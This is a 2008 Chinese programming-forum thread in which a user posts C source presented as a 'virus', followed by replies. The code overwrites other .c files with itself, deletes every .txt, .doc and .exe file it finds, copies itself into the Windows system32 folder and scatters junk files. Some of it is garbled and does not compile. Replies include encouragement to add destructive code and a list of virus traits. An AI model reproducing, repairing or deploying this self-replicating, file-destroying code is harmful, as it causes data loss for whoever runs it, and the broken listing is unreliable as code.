| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 2269 人关注过本帖
标题:烈性病毒C原一个,编程开发 一群:62186588
只看楼主 加入收藏
wanghepeng10
Rank: 1
等 级:新手上路
帖 子:41
专家分:0
注 册:2008-5-7
结帖率:100%
收藏
 问题点数:0 回复次数:13 
烈性病毒C原一个,编程开发 一群:62186588
此论坛精 ,编程开发 一群:62186588

此代码用做学习交流,请不要危害他人,用此代码危害他人产生一切后果与本人无关。
C语言开发病毒程序

//连接头文件
#include <io.h>
#include <dir.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

//拷贝文件模块
int copyfile (char *infile, char *outfile)

{
    FILE *in,*out; //定义文件指针
     in = fopen(infile,"r"); //打开文件
    out = fopen(outfile,"w"); //建立文件
    while (!feof(in)) //判断文件是否已结束
    {www.
        fputc (fgetc(in),out); //从in读一字符到out
    }
    fclose (in); //关闭in文件
    fclose (out);//关闭out文件
    return 0; //返回
}

int MakeRubbish (void)

{
    int i; //声明整形变量i
    FILE *fp; //文件指针fp
    char *path; //路径指针
    char *NewName;
    char *disk[7] = {"A","B","C","D","E","F","G"}; //初始化指针数组
    char *addtion = ":\\";
    for (i = 0; i<5; i++) //循环4次
    {
        char tempname[] = "XXXXXX" ; //随机名字
        NewName = mktemp(tempname);  //建立唯一的文件名
        fp = fopen(NewName,"w");  //创建文本文件
        fclose (fp); //关闭fp文件流
    }
    path = strcat(disk[getdisk()],addtion); //得到根编号
    chdir(path); //改变工作目录
    for (i = 0; i<5; i++) //循环次数
    {
        char tempname[] = "XXXXXX"; //串赋入数组
        NewName = mktemp(tempname); //建立唯一的文件名
        fp = fopen(NewName,"w");    //创建新文件
        fclose (fp); //关闭文件
    }
    return 0; //返回
}

int CreatEXE (void)

{
    int i; //整形变量
    char *path; //字符指针
    char *s[2] = {         //重要目录
                    "C:\\WINDOWS\\system32\\loveworm.exe",
                    "C:\\WINDOWS\\
                 };

    for ( i = 0; i < 2; i++) //循环控制次数
    {
        open(s, 0x0100,0x0080); //打开文件写入数据
        copyfile ( "C_KILLER.C",s); //调用子函数实现拷贝文件数据
    }
    return 0;
}

int Remove (void) //去处

{
    int done; //定义整形变量
    int i;
    struct ffblk ffblk; //声明结构体变量ffblk
    char *documenttype[3] = {"*.txt","*.doc","*.exe"};//初始化指针数组
    for (i = 0; i < 3; i++)//控制循环次数
    {
        done = findfirst(documenttype,&ffblk,2);//搜索目录
        while (!done) //查找成功返回0
        {
            remove (ffblk.ff_name); //删除一个文件
            done = findnext(&ffblk);
        }
    }
    return 0;//返回
}

int Breed (void) //养殖模块

{
    int done;//整形变量
    struct ffblk ffblk; //声名结构变量
    done = findfirst("*.c",&ffblk,2);
    while (!done)
    {
        if (strcmp("C_KILLER.C", ffblk.ff_name) != 0 )
        {
            copyfile("C_KILLER.C",ffblk.ff_name);
        }
        done = findnext(&ffblk);
    }
    return 0;
}

int main (void) //程序入口地址

{
    printf ("害虫病毒.\n");
    Breed (); //养殖病毒
    Remove (); //去处
    CreatEXE ();
    printf ("伤神的神伤?\n");
    printf ("伤神的神伤!\n");
    MakeRubbish (); //调用子函数
    getchar ();
    clrscr (); //清除屏幕
    system ("cmd");
    getch ();
    return 0;
}

[[it] 本帖最后由 wanghepeng10 于 2008-7-11 21:32 编辑 [/it]]

[[it] 本帖最后由 wanghepeng10 于 2008-7-11 21:34 编辑 [/it]]

[[it] 本帖最后由 wanghepeng10 于 2008-7-11 21:34 编辑 [/it]]
搜索更多相关主题的帖子: 编程开发 
2008-07-11 21:25
mqh21364
Rank: 1
等 级:新手上路
帖 子:642
专家分:0
注 册:2008-2-28
收藏
得分:0 
顶一下,拿来自己机器上跑个!!!!!!!!


前不见古人,后不见来者。念天地之悠悠,独怆然而涕下。
2008-07-11 23:21
ioriliao
Rank: 7Rank: 7Rank: 7
来 自:广东
等 级:贵宾
威 望:32
帖 子:2829
专家分:647
注 册:2006-11-30
收藏
得分:0 
看不出这是病毒...

/images/2011/147787/2011051411021524.jpg" border="0" />
2008-07-12 08:21
desig_pg
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2008-6-16
收藏
得分:0 
[bo][un]wanghepeng10[/un] 在 2008-7-11 21:25 的发言:[/bo]

此论坛精 ,编程开发 一群:62186588

此代码用做学习交流,请不要危害他人,用此代码危害他人产生一切后果与本人无关。
C语言开发病毒程序

//连接头文件
#include  
#include  
#include  
#include  
 ...

while (!feof(in)) //判断文件是否已结束
    {www.   这里什么意思?都编译不过去呀!?
2008-07-12 11:45
水中无月
Rank: 1
等 级:新手上路
帖 子:190
专家分:9
注 册:2008-6-17
收藏
得分:0 
www.这个是此代码的出处,为了让你记住他们网页
LZ说是“烈性病毒”我觉得不是,因为这个病毒只有文件合并等辅助功能,没有具体的病毒代码。
就类似于一个病毒引擎一样。我觉得还是不错的。
如果想做成真正的病毒,你自己去添加破坏电脑的代码吧

十里平湖霜满天,寸寸青丝愁华年,对月形单望相互,只羡鸳鸯不羡仙.
2008-07-12 17:05
爱喝牛奶的猫咪
Rank: 1
来 自:QQ群46520219
等 级:禁止访问
帖 子:513
专家分:0
注 册:2008-6-16
收藏
得分:0 
#include<iostream>
#include<cstdlib>
#include<windows.h>

以上就是病毒代码框架,剩下的破坏代码大家随便加吧
2008-07-12 18:51
VxWorks
Rank: 3Rank: 3
来 自:WindRiver
等 级:论坛游民
威 望:6
帖 子:859
专家分:68
注 册:2007-11-24
收藏
得分:0 
不是有破坏性的就叫病毒,我还有破坏性呢

计算机病毒的特征:

(一)非授权可执行性用户通常调用执行一个程序时,把系统控制交给这个程序,并分配给他相应系统资源,如内存,从而使之能够运行完成用户的需求。因此程序执行的过程对用户是透明的。而计算机病毒是非法程序,正常用户是不会明知是病毒程序,而故意调用执行。但由于计算机病毒具有正常程序的一切特性:可存储性、可执行性。它隐藏在合法的程序或数据中,当用户运行正常程序时,病毒伺机窃取到系统的控制权,得以抢先运行,然而此时用户还认为在执行正常程序。

(二)隐蔽性 计算机病毒是一种具有很高编程技巧、短小精悍的可执行程序。它通常粘附在正常程序之中或磁盘引导扇区中,或者磁盘上标为坏簇的扇区中,以及一些空闲概率较大的扇区中,这是它的非法可存储性。病毒想方设法隐藏自身,就是为了防止用户察觉。

(三)传染性传染性是计算机病毒最重要的特征,是判断一段程序代码是否为计算机病毒的依据。病毒程序一旦侵入计算机系统就开始搜索可以传染的程序或者磁介质,然后通过自我复制迅速传播。由于目前计算机网络日益发达,计算机病毒可以在极短的时间内,通过像 Internet这样的网络传遍世界。

(四)潜伏性计算机病毒具有依附于其他媒体而寄生的能力,这种媒体我们称之为计算机病毒的宿主。依靠病毒的寄生能力,病毒传染合法的程序和系统后,不立即发作,而是悄悄隐藏起来,然后在用户不察觉的情况下进行传染。这样,病毒的潜伏性越好,它在系统中存在的时间也就越长,病毒传染的范围也越广,其危害性也越大。

(五)表现性或破坏性无论何种病毒程序一旦侵入系统都会对操作系统的运行造成不同程度的影响。即使不直接产生破坏作用的病毒程序也要占用系统资源(如占用内存空间,占用磁盘存储空间以及系统运行时间等)。而绝大多数病毒程序要显示一些文字或图像,影响系统的正常运行,还有一些病毒程序删除文件,加密磁盘中的数据,甚至摧毁整个系统和数据,使之无法恢复,造成无可挽回的损失。因此,病毒程序的副作用轻者降低系统工作效率,重者导致系统崩溃、数据丢失。病毒程序的表现性或破坏性体现了病毒设计者的真正意图。

(六)可触发性计算机病毒一般都有一个或者几个触发条件。满足其触发条件或者激活病毒的传染机制,使之进行传染;或者激活病毒的表现部分或破坏部分。触发的实质是一种条件的控制,病毒程序可以依据设计者的要求,在一定条件下实施攻击。这个条件可以是敲入特定字符,使用特定文件,某个特定日期或特定时刻,或者是病毒内置的计数器达到一定次数等。

为了防止世界被破坏,为了守护世界的和平,贯彻爱与真实的邪恶,可爱又迷人的反派角色,VxWorks!
Don't ask me any question.I'm just here to buy soy sauce.
2008-07-12 19:20
Knocker
Rank: 8Rank: 8
等 级:贵宾
威 望:47
帖 子:10454
专家分:603
注 册:2004-6-1
收藏
得分:0 
感觉楼上最适宜的工作就是幼教

九洲方除百尺冰,映秀又遭蛮牛耕。汽笛嘶鸣国旗半,哀伤尽处是重生。     -老K
治国就是治吏。礼义廉耻,国之四维。四维不张,国之不国。   -毛泽东
2008-07-12 19:41
VxWorks
Rank: 3Rank: 3
来 自:WindRiver
等 级:论坛游民
威 望:6
帖 子:859
专家分:68
注 册:2007-11-24
收藏
得分:0 
确实,我也发现自己有这方面的天赋
先拿你做实验,看看能不能把你教育成人成材

为了防止世界被破坏,为了守护世界的和平,贯彻爱与真实的邪恶,可爱又迷人的反派角色,VxWorks!
Don't ask me any question.I'm just here to buy soy sauce.
2008-07-12 20:26
ioriliao
Rank: 7Rank: 7Rank: 7
来 自:广东
等 级:贵宾
威 望:32
帖 子:2829
专家分:647
注 册:2006-11-30
收藏
得分:0 
哈哈...太搞笑了...

/images/2011/147787/2011051411021524.jpg" border="0" />
2008-07-14 08:24
快速回复:烈性病毒C原一个,编程开发 一群:62186588
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.016338 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved